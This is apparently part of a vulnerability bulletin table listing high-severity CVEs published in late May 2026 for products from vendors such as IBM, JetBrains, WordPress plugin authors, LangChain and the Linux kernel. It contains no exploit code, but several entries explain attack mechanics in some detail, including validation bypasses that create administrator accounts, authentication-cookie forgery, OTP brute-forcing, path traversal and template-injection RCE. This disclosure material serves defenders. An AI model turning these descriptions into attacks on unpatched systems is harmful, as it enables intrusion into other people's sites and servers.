| htplugins--HT Contact Form Drag & Drop Form Builder for WordPress | The HT Contact Form - Drag & Drop Form Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'file_upload' parameter in all versions up to, and including, 2.8.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires the 'Store Submissions' setting to be enabled, as this controls whether unsanitized field values are persisted to the database and subsequently rendered via dangerouslySetInnerHTML in the admin entry viewer. | 2026-05-28 | 7.2 | CVE-2026-7052 |
| hwk-fr--Advanced Custom Fields: Extended | The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to Privilege Escalation via Validation Bypass in all versions up to and including 0.9.2.5. The vulnerability exists due to the after_validate_save_post() function unconditionally trusting the attacker-controlled _acf_post_id POST parameter - with no authentication or integrity verification - to select a cleanup branch that silently discards all validation errors not prefixed with acfe:. This makes it possible for unauthenticated attackers to suppress both the role allow-list validation error added by acfe_field_user_roles::validate_front_value() and the administrator-role capability guard error added by acfe_module_form_action_user::validate_action(), causing wp_insert_user() to execute with an attacker-supplied administrator role argument and resulting in the creation of a new administrator-level user account. Exploitation requires the target site to expose a public ACFE frontend form configured with a Create User action that maps a role field. | 2026-05-28 | 9.8 | CVE-2026-8809 |
| IBM--Aspera High-Speed Transfer Endpoint | IBM Aspera High-Speed Transfer Endpoint 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Server 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Endpoint are affected by a buffer overflow in the asperahttpd component. This vulnerability could be exploited to cause a denial of service and potentially lead to authentication bypass or remote code execution. | 2026-05-27 | 9.8 | CVE-2026-8175 |
| IBM--Aspera High-Speed Transfer Endpoint | IBM Aspera High-Speed Transfer Endpoint 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Server 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Endpoint are affected by a buffer overflow in the asperahttpd component. This vulnerability could allow an authenticated user to execute arbitrary code on the system. | 2026-05-27 | 8.8 | CVE-2026-8179 |
| IBM--Aspera High-Speed Transfer Endpoint | IBM Aspera High-Speed Transfer Endpoint 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Server 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Endpoint are affected by a potential denial of service in the asperahttpd component. An unauthenticated user can cause the asperahttpd service to crash. | 2026-05-27 | 7.5 | CVE-2026-8180 |
| IBM--Controller | IBM Controller 11.0.1, 11.1.0, 11.1.1, and 11.1.2 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. | 2026-05-27 | 8.8 | CVE-2026-5065 |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9 and 12.1.0 through 12.1.4 are vulnerable to a denial of service with a specially crafted query when autonomous transactions are enabled. | 2026-05-27 | 7.1 | CVE-2026-1718 |
| IBM--Engineering Lifecycle Management | IBM Engineering Lifecycle Management 7.0.3, 7.1.0, and 7.2.0 could allow an unauthenticated remote attacker to update server property files that would allow them to gain unauthorized access to the application. | 2026-05-26 | 9.8 | CVE-2026-3660 |
| IBM--Engineering Lifecycle Management | IBM Engineering Lifecycle Management 7.0.3 Interim Fix 001 through Interim Fix 021, 7.1.0 Interim Fix 001 through Interim Fix 009, and 7.2.0 and 7.2.0 Interim Fix 001 are vulnerable to an XML external entity injection (XXE) attack when processing XML data. An authenticated attacker could exploit this vulnerability to expose sensitive information or consume memory resources. | 2026-05-26 | 7.1 | CVE-2026-3603 |
| IBM--Engineering Lifecycle Management | IBM Engineering Lifecycle Management 7.0.3, 7.1.0, and 7.2.0 could allow an attacker with administrative privileges to execute remote code due to an exposed method that is not properly restricted. | 2026-05-26 | 7.2 | CVE-2026-4051 |
| IBM--HTTP Server | IBM HTTP Server 8.5 and 9.0 contain a buffer overflow vulnerability. A privileged user, authenticated to the Administration Server, could exploit this vulnerability to execute remote code or cause a denial of service. | 2026-05-26 | 8 | CVE-2026-8834 |
| IBM--HTTP Server | IBM HTTP Server 8.5 and 9.0 are vulnerable to remote code execution and denial of service in configurations with TLS mutual authentication (client authentication). | 2026-05-26 | 8.1 | CVE-2026-8855 |
| IBM--HTTP Server | IBM HTTP Server 8.5 and 9.0 are vulnerable to an invalid pointer dereference. A privileged user, authenticated to the Administration Server, could exploit this vulnerability to expose sensitive information or cause a denial of service. | 2026-05-26 | 7.3 | CVE-2026-8835 |
| IBM--HTTP Server | IBM HTTP Server 8.5 and 9.0 are vulnerable to denial of service via the optional module mod_ibm_upload. | 2026-05-26 | 7.5 | CVE-2026-8850 |
| IBM--HTTP Server | IBM HTTP Server 8.5 and 9.0 are vulnerable to denial of service via the optional module mod_mem_cache. | 2026-05-26 | 7.5 | CVE-2026-8854 |
| IBM--HTTP Server | IBM HTTP Server 8.5 and 9.0 are vulnerable to denial of service in configurations where an attacker has write access to parts of the server configuration. | 2026-05-26 | 7.7 | CVE-2026-8856 |
| IBM--InfoSphere Optim Test Data Fabrication | IBM InfoSphere Optim Test Data Fabrication 1.0.0, 1.0.0.1, 1.0.0.2, 1.0.2, 1.0.2.2, 1.0.2.3, 1.0.2.4, 1.0.2.5, 1.0.2.6, 1.0.2.7 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. | 2026-05-27 | 7.5 | CVE-2026-3366 |
| IBM--Langflow OSS | IBM Langflow OSS 1.0.0 through 1.9.1 could allow remote code execution due to improper validation of symbolic links during archive extraction. | 2026-05-27 | 9.8 | CVE-2026-7524 |
| IBM--Langflow OSS | IBM Langflow OSS 1.0.0 through 1.9.0 could allow a denial of service due to uncontrolled resource consumption. | 2026-05-27 | 7.1 | CVE-2026-7528 |
| IBM--Netezza Performance Server Replication Services | IBM Netezza Performance Server Replication Services 3.0.2.0 through 3.0.5.0 allows an attacker with low‑privileged access to escalate their privileges to root. By exploiting this flaw, the attacker can execute root‑level commands, obtain a root shell, and change the root user's password. Successful exploitation also enables modification or removal of system‑wide files and the installation of persistent backdoors. This results in full system compromise with complete loss of confidentiality, integrity, and availability. | 2026-05-27 | 7.8 | CVE-2026-3623 |
| IBM--Operations Analytics - Log Analysis | IBM Operations Analytics - Log Analysis and IBM SmartCloud Analytics - Log Analysis use default passwords from the manufacturing process during the installation process, which could allow an attacker to bypass authentication. | 2026-05-27 | 8.4 | CVE-2026-7365 |
| IBM--QRadar | IBM QRadar 7.5.0 through 7.5.0 UP15 Interim Fix 002 could allow a privileged user to upload a malicious backup archive that could be restored and used to gain access to the underlying operating system. | 2026-05-27 | 7.2 | CVE-2024-56462 |
| IBM--Web Server Plug-ins for WebSphere Application Server and WebSphere Liberty | IBM Web Server Plug-ins for WebSphere Application Server and WebSphere Liberty 8.5, 9.0 IBM WebSphere Application Server and WebSphere Application Server Liberty are vulnerable to remote code execution in the Web Server Plug-ins, through a specially crafted request. | 2026-05-26 | 9.8 | CVE-2026-8633 |
| IBM--Web Server Plug-ins for WebSphere Application Server and WebSphere Liberty | IBM Web Server Plug-ins for WebSphere Application Server and WebSphere Liberty 8.5, 9.0 IBM WebSphere Application Server and WebSphere Application Server Liberty are vulnerable to HTTP request smuggling in the Web Server Plug-ins through a specially crafted request. | 2026-05-26 | 7.5 | CVE-2026-8620 |
| india-web-developer--Login with OTP | The Login with OTP plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.6. This is due to an incomplete fix for CVE-2024-11178: the rate-limit/lockout check added to `otpl_login_action()` was placed only inside the OTP-generation branch and is never evaluated on the OTP-validation branch, and the generated 6-digit OTP additionally has no expiration. This makes it possible for unauthenticated attackers to brute-force the 900,000-value OTP space for any user account (including administrators) and obtain a valid `wp_set_auth_cookie()` session, leading to full site compromise. | 2026-05-27 | 9.8 | CVE-2026-8760 |
| inducer--relate | RELATE is a web-based courseware package. Versions prior to commit 555f0efb1c5bd7531c07cd73724d7e566a81f620 have a stored cross-site scripting vulnerability that allows any enrolled student to execute arbitrary JavaScript in an administrator's browser session, potentially leading to full admin account takeover. The `get_user()` method in `ParticipationAdmin` renders user-controlled input using `mark_safe` combined with Python's % string formatting. This bypasses Django's automatic HTML escaping entirely. The value returned by `get_full_name` is derived directly from the `first_name` and `last_name` fields of the User model. These fields are freely editable by any authenticated user through the profile page (`/profile/`) with no sanitization applied. When an admin views the Participation list in the Django admin panel, the unsanitized value is rendered directly into the HTML response, causing the injected script to execute in the admin's browser. Commit 555f0efb1c5bd7531c07cd73724d7e566a81f620 fixes the issue. | 2026-05-27 | 8.7 | CVE-2026-42197 |
| infiniflow--ragflow | RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In 0.24.0 and earlier, a Jinja2 template injection in the prompt generator (rag/prompts/generator.py) allows any authenticated user to execute arbitrary OS commands on the server. Any normal user can register, create a Canvas workflow with a DuckDuckGo + LLM component chain, and trigger the SSTI. | 2026-05-29 | 9.9 | CVE-2026-45312 |
| IniLerm--Advanced IP Blocker | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in IniLerm Advanced IP Blocker advanced-ip-blocker allows DOM-Based XSS. This issue affects Advanced IP Blocker: from n/a through <= 8.10.7. | 2026-05-27 | 7.1 | CVE-2026-42739 |
| Interinfo--DreamMaker | DreamMaker developed by Interinfo has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2026-05-29 | 9.8 | CVE-2026-10071 |
| Interinfo--DreamMaker | DreamMaker developed by Interinfo has an Arbitrary File Upload vulnerability, allowing privileged remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2026-05-29 | 7.2 | CVE-2026-10072 |
| Interinfo--DreamMaker | DreamMaker developed by Interinfo has an Arbitrary File Read vulnerability, allowing unauthenticated local attackers to exploit Relative Path Traversal to download arbitrary system files. | 2026-05-29 | 7.5 | CVE-2026-10073 |
| intranda--goobi-viewer-core | The Goobi viewer is a web application that allows digitised material to be displayed in a web browser. From 4.8.0 to before 26.04.1, the Goobi viewer REST endpoint POST /api/v1/index/stream accepted an arbitrary Solr streaming expression from unauthenticated network clients and forwarded it to the backend Solr server without restriction. An attacker could read the complete Solr index and, in default Solr deployments, also modify or delete indexed records. This vulnerability is fixed in 26.04.1. | 2026-05-27 | 9.8 | CVE-2026-45083 |
| Iqonic Design--KiviCare | Authentication Bypass Using an Alternate Path or Channel vulnerability in Iqonic Design KiviCare kivicare-clinic-management-system allows Password Recovery Exploitation. This issue affects KiviCare: from n/a through <= 4.3.0. | 2026-05-27 | 8.2 | CVE-2026-42735 |
| itsourcecode--Courier Management System | A vulnerability has been found in itsourcecode Courier Management System 1.0. Impacted is an unknown function of the file /manage_user.php. Such manipulation of the argument ID leads to sql injection. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. | 2026-05-26 | 7.3 | CVE-2026-9606 |
| itsourcecode--Electronic Judging System | A vulnerability has been found in itsourcecode Electronic Judging System 1.0. This affects an unknown part of the file /admin/edit_judge.php. The manipulation of the argument judge_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-05-26 | 7.3 | CVE-2026-9525 |
| itsourcecode--Electronic Judging System | A vulnerability was found in itsourcecode Electronic Judging System 1.0. This vulnerability affects unknown code of the file /admin/edit_team.php. The manipulation of the argument num_id results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2026-05-26 | 7.3 | CVE-2026-9526 |
| itsourcecode--Electronic Judging System | A vulnerability was identified in itsourcecode Electronic Judging System 1.0. Impacted is an unknown function of the file /admin/delete_judge.php. Such manipulation of the argument judge_id leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used. | 2026-05-26 | 7.3 | CVE-2026-9528 |
| itsourcecode--Student Transcript Processing System | A vulnerability was detected in itsourcecode Student Transcript Processing System 1.0. This affects an unknown part of the file /admin/modules/student/index.php?view=view. Performing a manipulation of the argument studentId results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. | 2026-05-26 | 7.3 | CVE-2026-9573 |
| itsourcecode--Student Transcript Processing System | A flaw has been found in itsourcecode Student Transcript Processing System 1.0. This vulnerability affects unknown code of the file /admin/modules/student/trans.php. Executing a manipulation of the argument studentId/cid can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. | 2026-05-26 | 7.3 | CVE-2026-9574 |
| itsourcecode--Student Transcript Processing System | A vulnerability has been found in itsourcecode Student Transcript Processing System 1.0. This issue affects some unknown processing of the file /admin/modules/class/index.php?view=view. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-05-26 | 7.3 | CVE-2026-9575 |
| JasperFx--marten | Marten is a .NET Transactional Document DB and Event Store on PostgreSQL. Prior to 8.36.1, Marten's full-text search APIs interpolated the user-supplied regConfig parameter directly into the generated SQL without parameterization or validation, making every code path that exposes regConfig to untrusted input a SQL injection sink. This vulnerability is fixed in 8.36.1. | 2026-05-28 | 9.8 | CVE-2026-45288 |
| JeecgBoot--JeecgBoot | A vulnerability was determined in JeecgBoot up to 3.9.1. The affected element is the function LoginController.selectDepart of the file /sys/selectDepart. This manipulation causes improper access controls. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. Upgrading to version 3.9.2 is sufficient to fix this issue. It is suggested to upgrade the affected component. | 2026-05-26 | 7.3 | CVE-2026-9580 |
| JetBrains--IntelliJ IDEA | In JetBrains IntelliJ IDEA before 2026.1.1, command execution was possible via the guest user account. | 2026-05-29 | 8 | CVE-2026-49367 |
| JetBrains--IntelliJ IDEA | In JetBrains IntelliJ IDEA before 2026.1.1, command injection was possible via filename completion. | 2026-05-29 | 7.8 | CVE-2026-49366 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1.1, reflected XSS in the keyword filter was possible. | 2026-05-29 | 7.1 | CVE-2026-49371 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1, 2025.11.5, unauthenticated SSRF via build status was possible. | 2026-05-29 | 7.5 | CVE-2026-49372 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1, remote code execution was possible via Perforce connection settings. | 2026-05-29 | 7.1 | CVE-2026-49373 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1, improper permission checks exposed build configuration parameters. | 2026-05-29 | 7.6 | CVE-2026-49374 |
| JetBrains--YouTrack | In JetBrains YouTrack before 2026.1.13162, stored XSS in project notification templates was possible. | 2026-05-29 | 8.7 | CVE-2026-49368 |
| Jinan USR IOT Technology Limited (PUSR)--USR-W610 RS232/485 to Wi-Fi/Ethernet Converter | Jinan USR IOT Technology Limited (PUSR) USR-W610 RS232/485 to Wi-Fi/Ethernet Converter device firmware contains plaintext administrative credentials embedded in the firmware image. These credentials can be extracted through firmware analysis and used to authenticate to device services. | 2026-05-29 | 9.8 | CVE-2026-7786 |
| jpadilla--pyjwt | PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens while supporting both asymmetric and HMAC algorithms, the library does not validate the use of JSON Web Keys in the HMAC algorithm, allowing an attacker to use the issuer public key as the secret key for the HMAC algorithm. This vulnerability is fixed in 2.13.0. | 2026-05-28 | 7.4 | CVE-2026-48526 |
| jpettitt--meshcore-card | MeshCore Card provides MeshCore Lovelace card for Home Assistant. Prior to 0.3.3, Meshcore node names are rendered without HTML escaping in meshcore-card, allowing any node within direct or indirect (repeated) radio range to execute arbitrary javascript in the Home Assistant frontend of anyone viewing the card. This vulnerability is fixed in 0.3.3. | 2026-05-28 | 9.6 | CVE-2026-45323 |
| Jthemes--Themebox - Digital Products Ecommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jthemes Themebox - Digital Products Ecommerce allows Reflected XSS. This issue affects Themebox - Digital Products Ecommerce: from n/a through 1.4.2. | 2026-05-27 | 7.1 | CVE-2025-52747 |
| jxxghp--MoviePilot | MoviePilot v2 contains a server-side request forgery vulnerability in the image proxy endpoint that allows authenticated attackers to request arbitrary URLs by supplying a resource_token cookie and a URL whose domain matches the assembled allowlist. Attackers can bypass internal network protections because the SecurityUtils.is_safe_url function performs only domain-membership checking without blocking private, loopback, or link-local addresses, enabling enumeration of internal services such as Jellyfin, Emby, or Plex and exfiltration of data from internal network resources. | 2026-05-29 | 7.7 | CVE-2026-10107 |
| Kados--Kados R10 GreenBee | Kados R10 GreenBee contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the release_id parameter of boards_buttons/update_release.php. The release_id value is concatenated directly into SQL statements without sanitization, allowing attackers to send a crafted GET request with a UNION-based payload to extract sensitive database information including the current user, database name, and DBMS version. | 2026-05-29 | 8.2 | CVE-2018-25394 |
| Kados--Kados R10 GreenBee | Kados R10 GreenBee contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the feature_id parameter of boards_buttons/update_feature.php. The feature_id value is concatenated directly into SQL statements without sanitization, allowing attackers to send a crafted GET request with a UNION-based payload to extract sensitive database information including the current user, database name, and DBMS version. | 2026-05-29 | 8.2 | CVE-2018-25395 |
| karakeep-app--karakeep | Karakeep is a self-hostable bookmark-everything app. A Server-Side Request Forgery (SSRF) protection bypass vulnerability was identified in versions prior to 0.32.0 affecting redirect-following processing components. Although the application implements protections intended to prevent requests toward internal/private network destinations, these protections could be bypassed through crafted HTTP redirect chains. By leveraging attacker-controlled redirects, an authenticated user could cause vulnerable application components to initiate requests toward internally reachable Docker network services accessible from the application environment. The issue affected multiple processing paths, including crawler-related functionality and video download processing flows. Version 0.32.0 contains a patch. | 2026-05-26 | 7.6 | CVE-2026-45082 |
| kaspernj--form-data-objectizer | form-data-objectizer converts FormData to object. Prior to 1.0.1, form-data-objectizer walks bracket-notation form keys (e.g. name[sub]) into nested objects without filtering __proto__, constructor, or prototype. A single HTTP form field whose name starts with __proto__[...] causes the library to mutate Object.prototype, which is a prototype pollution primitive of the entire Node.js process. This vulnerability is fixed in 1.0.1. | 2026-05-29 | 8.2 | CVE-2026-46510 |
| klever-io--klever-go | Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.17, a remote, unauthenticated denial-of-service vulnerability in Batch.Decompress (data/batch/batch.go) allows any peer that participates in a topic served by MultiDataInterceptor to allocate multi-gigabyte heaps on the receiving node from a sub-50 KiB gossip payload. A single packet is sufficient to OOM-kill a validator with conventional memory provisioning. Fleet-wide application affects chain liveness. This vulnerability is fixed in 1.7.17. | 2026-05-29 | 8.6 | CVE-2026-44697 |
| KLiK--KLiK SocialMediaWebsite | A vulnerability was determined in KLiK SocialMediaWebsite 1.0. This vulnerability affects the function uniqid of the file upload.inc.php of the component File Handler. This manipulation causes unrestricted upload. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-25 | 7.3 | CVE-2026-9421 |
| KLiK--KLiK SocialMediaWebsite | A vulnerability was identified in KLiK SocialMediaWebsite 1.0. This issue affects some unknown processing of the component HTTP POST Request Parameter Handler. Such manipulation leads to injection. The attack can be launched remotely. The exploit is publicly available and might be used. | 2026-05-25 | 7.3 | CVE-2026-9422 |
| KMW--KM-IP521 | The affected KMW CCTV Security Cameras are vulnerable to a critical unauthenticated password reset. This flaw allows an attacker to remotely reset the administrator password to a known value without authentication, granting full access to the camera feeds and settings. | 2026-05-29 | 9.1 | CVE-2026-5386 |
| Koa--@koa/router | Versions of the package @koa/router from 14.0.0 and before 15.0.0 are vulnerable to Access Control Bypass due to the middleware being silently dropped from the execution chain when the router prefix contains path parameters. Depending on what the skipped middleware was supposed to protect, an attacker could bypass authentication and authorization, evade rate limiting or bypass input sanitization. | 2026-05-26 | 7.3 | CVE-2026-9495 |
| Kovah--LinkAce | LinkAce is a self-hosted archive to collect website links. Prior to 2.5.6, the setup database configuration flow on uninitialized LinkAce instances accepts attacker-controlled database credential fields and writes them back into .env without escaping. A remote attacker who can reach the setup endpoints and supply a database they control can inject mail configuration variables and achieve command execution when the application later sends mail. This vulnerability is fixed in 2.5.6. | 2026-05-28 | 8.1 | CVE-2026-45344 |
| kysely-org--kysely | Kysely is a type-safe TypeScript SQL query builder. From 0.26.0 to 0.28.16, DefaultQueryCompiler.visitJSONPathLeg does not escape JSON-path metacharacters (., [, ], *, **, ?). When attacker-controlled input flows into eb.ref(col, '->$').key(input) or .at(input) - including type-safe code where the JSON column is shaped like Record<string, T> so K extends string is the inferred type - every dot becomes a path-leg separator, letting an attacker traverse from the intended key into sibling and child fields the developer never meant to expose. The result is read access (and, in update statements, write access) to JSON sub-fields outside the intended scope across MySQL, PostgreSQL ->$/->>$, and SQLite. This vulnerability is fixed in 0.28.17. | 2026-05-27 | 7.5 | CVE-2026-44635 |
| labring--FastGPT | FastGPT is an AI Agent building platform. Prior to 4.15.0-beta1, a Server-Side Request Forgery (SSRF) vulnerability allows an authenticated attacker to bypass the global isInternalAddress network protection and make arbitrary HTTP GET requests to internal network services. This is achieved by exploiting an incomplete fix in the dataset preview endpoint /api/core/dataset/file/getPreviewChunks when utilizing the externalFile data import type. This vulnerability is fixed in 4.15.0-beta1. | 2026-05-29 | 7.7 | CVE-2026-44285 |
| Lakeside Software, LLC.--SysTrack Agent | Lakeside SysTrack Agent versions prior to 11.2.1.28, 11.3.0.38, 11.4.0.24, 11.5.0.15 contain an out-of-bounds read vulnerability in the Command ID 30 UDP packet handler that allows remote attackers to crash the application by sending a specially crafted UDP packet. Attackers can send a malformed packet with an invalid memory address at offset 0x4 in the payload to trigger an access violation and cause a denial of service. | 2026-05-28 | 7.5 | CVE-2026-39929 |
| langchain-ai--langchain | LangChain is a framework for building agents and LLM-powered applications. Prior to 0.3.85 and 1.3.3, LangChain contains older runtime code paths that deserialize run inputs, run outputs, or other application-controlled payloads using overly broad object allowlists. These paths may call load() with allowed_objects="all". This does not enable arbitrary Python object deserialization, but it does allow any trusted LangChain-serializable object to be revived, which is broader than these runtime paths require. As a result, attacker-supplied LangChain serialized constructor dictionaries may cause trusted runtime paths to instantiate classes with untrusted constructor arguments. This vulnerability is fixed in 0.3.85 and 1.3.3. | 2026-05-26 | 8.2 | CVE-2026-44843 |
| langchain-ai--langsmith-sdk | LangSmith Client SDKs provide SDK's for interacting with the LangSmith platform. Prior to LangSmith SDK Python 0.8.0 and JS/TS 0.6.0, the LangSmith SDK's prompt pull methods (pull_prompt / pull_prompt_commit in Python, pullPrompt / pullPromptCommit in JS/TS) fetch and deserialize prompt manifests from the LangSmith Hub. These manifests may contain serialized LangChain objects and model configuration that affect runtime behavior. When pulling a public prompt by owner/name identifier, the manifest content is controlled by an external party, but prior versions of the SDK did not distinguish this from pulling a prompt within the caller's own organization. This vulnerability is fixed in LangSmith SDK Python 0.8.0 and JS/TS 0.6.0. | 2026-05-27 | 7.1 | CVE-2026-45134 |
| learnnearclub--Login with NEAR | The Login with NEAR plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 0.3.3. The `ajaxLoginWithNear()` function - registered as a `wp_ajax_nopriv` action and therefore reachable by unauthenticated users - accepts an attacker-supplied `account` POST parameter and issues a valid WordPress authentication cookie based solely on a substring check for `.near`, with no nonce verification, cryptographic signature validation, challenge-response exchange, or any proof that the requester controls the corresponding NEAR wallet. This makes it possible for unauthenticated attackers to log in as any existing WordPress user, including administrators, whose email address matches the deterministic `<account>@near.org` pattern derived from the supplied `account` value. If no matching user exists, the handler automatically creates and authenticates a new WordPress account for the attacker-controlled identifier, providing a further avenue for unauthorized account creation. | 2026-05-27 | 8.1 | CVE-2026-8994 |
| leiweibau--Pi.Alert | Pi.Alert is a WIFI / LAN intruder detector with web service monitoring. Prior to 2026-05-07, Pi.Alert's web-based configuration editor allows arbitrary Python code to be injected into pialert.conf. Since the background scan daemon loads this file via Python's exec(), injected code executes as the daemon process. With web protection disabled (the default configuration), no authentication is required, making this an unauthenticated Remote Code Execution vulnerability. This vulnerability is fixed in 2026-05-07. | 2026-05-27 | 9.8 | CVE-2026-44887 |
| leiweibau--Pi.Alert | Pi.Alert is a WIFI / LAN intruder detector with web service monitoring. Prior to 2026-05-07, Pi.Alert's SaveConfigFile() endpoint writes user-supplied numeric config values (e.g., SMTP_PORT) directly into pialert.conf without validation. Since pialert.conf is loaded via Python's exec() every 3-5 minutes by the background cron process, an attacker can inject arbitrary Python code and achieve unauthenticated OS-level RCE. On default installations (PIALERT_WEB_PROTECTION = False), no credentials are required. This vulnerability is fixed in 2026-05-07. | 2026-05-27 | 9.8 | CVE-2026-44888 |
| LibVNC--libvncserver | LibVNCClient is a library for easy implementation of a VNC client. In 0.9.15 and earlier, LibVNCClient's Tight encoding decoder uses fixed-size 2048-pixel scratch buffers for the Gradient filter, but it does not reject Tight rectangles whose width is larger than 2048 pixels. A malicious VNC server can send a crafted FramebufferUpdate rectangle using Tight encoding with NoZlib | ExplicitFilter and the Gradient filter. When a LibVNCClient-based client connects, the client processes the server-controlled rectangle width and writes beyond fixed-size Gradient buffers. This vulnerability is fixed with commit 5b270544b85233668b98161323297d418a8f5fd1. | 2026-05-27 | 8.8 | CVE-2026-44988 |
| linkwhspr--Link Whisper Free | The Link Whisper Free plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user_id parameter in all versions up to, and including, 0.9.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-29 | 7.2 | CVE-2025-11262 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/iwcm: Fix workqueue list corruption by removing work_list The commit e1168f0 ("RDMA/iwcm: Simplify cm_event_handler()") changed the work submission logic to unconditionally call queue_work() with the expectation that queue_work() would have no effect if work was already pending. The problem is that a free list of struct iwcm_work is used (for which struct work_struct is embedded), so each call to queue_work() is basically unique and therefore does indeed queue the work. This causes a problem in the work handler which walks the work_list until it's empty to process entries. This means that a single run of the work handler could process item N+1 and release it back to the free list while the actual workqueue entry is still queued. It could then get reused (INIT_WORK...) and lead to list corruption in the workqueue logic. Fix this by just removing the work_list. The workqueue already does this for us. This fixes the following error that was observed when stress testing with ucmatose on an Intel E830 in iWARP mode: [ 151.465780] list_del corruption. next->prev should be ffff9f0915c69c08, but was ffff9f0a1116be08. (next=ffff9f0a15b11c08) [ 151.466639] ------------[ cut here ]------------ [ 151.466986] kernel BUG at lib/list_debug.c:67! | 2026-05-27 | 9.8 | CVE-2026-45898 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix potential UAF and double free in smb2_open_file() Zero out @err_iov and @err_buftype before retrying SMB2_open() to prevent an UAF bug if @data != NULL, otherwise a double free. | 2026-05-27 | 9.8 | CVE-2026-45972 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix re-decryption of RESPONSE packets If a RESPONSE packet gets a temporary failure during processing, it may end up in a partially decrypted state - and then get requeued for a retry. Fix this by just discarding the packet; we will send another CHALLENGE packet and thereby elicit a further response. Similarly, discard an incoming CHALLENGE packet if we get an error whilst generating a RESPONSE; the server will send another CHALLENGE. | 2026-05-27 | 9.8 | CVE-2026-45988 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxgk: Fix potential integer overflow in length check Fix potential integer overflow in rxgk_extract_token() when checking the length of the ticket. Rather than rounding up the value to be tested (which might overflow), round down the size of the available data. | 2026-05-27 | 9.8 | CVE-2026-46039 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Validate pad and ICRC before payload_size() in rxe_rcv rxe_rcv() currently checks only that the incoming packet is at least header_size(pkt) bytes long before payload_size() is used. However, payload_size() subtracts both the attacker-controlled BTH pad field and RXE_ICRC_SIZE from pkt->paylen: payload_size = pkt->paylen - offset[RXE_PAYLOAD] - bth_pad(pkt) - RXE_ICRC_SIZE This means a short packet can still make payload_size() underflow even if it includes enough bytes for the fixed headers. Simply requiring header_size(pkt) + RXE_ICRC_SIZE is not sufficient either, because a packet with a forged non-zero BTH pad can still leave payload_size() negative and pass an underflowed value to later receive-path users. Fix this by validating pkt->paylen against the full minimum length required by payload_size(): header_size(pkt) + bth_pad(pkt) + RXE_ICRC_SIZE. | 2026-05-27 | 9.1 | CVE-2026-46043 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: add pgmap check to biovec_phys_mergeable biovec_phys_mergeable() is used by the request merge, DMA mapping, and integrity merge paths to decide if two physically contiguous bvec segments can be coalesced into one. It currently has no check for whether the segments belong to different dev_pagemaps. When zone device memory is registered in multiple chunks, each chunk gets its own dev_pagemap. A single bio can legitimately contain bvecs from different pgmaps -- iov_iter_extract_bvecs() breaks at pgmap boundaries but the outer loop in bio_iov_iter_get_pages() continues filling the same bio. If such bvecs are physically contiguous, biovec_phys_mergeable() will coalesce them, making it impossible to recover the correct pgmap for the merged segment via page_pgmap(). Add a zone_device_pages_have_same_pgmap() check to prevent merging bvec segments that span different pgmaps. | 2026-05-28 | 9.8 | CVE-2026-46115 |
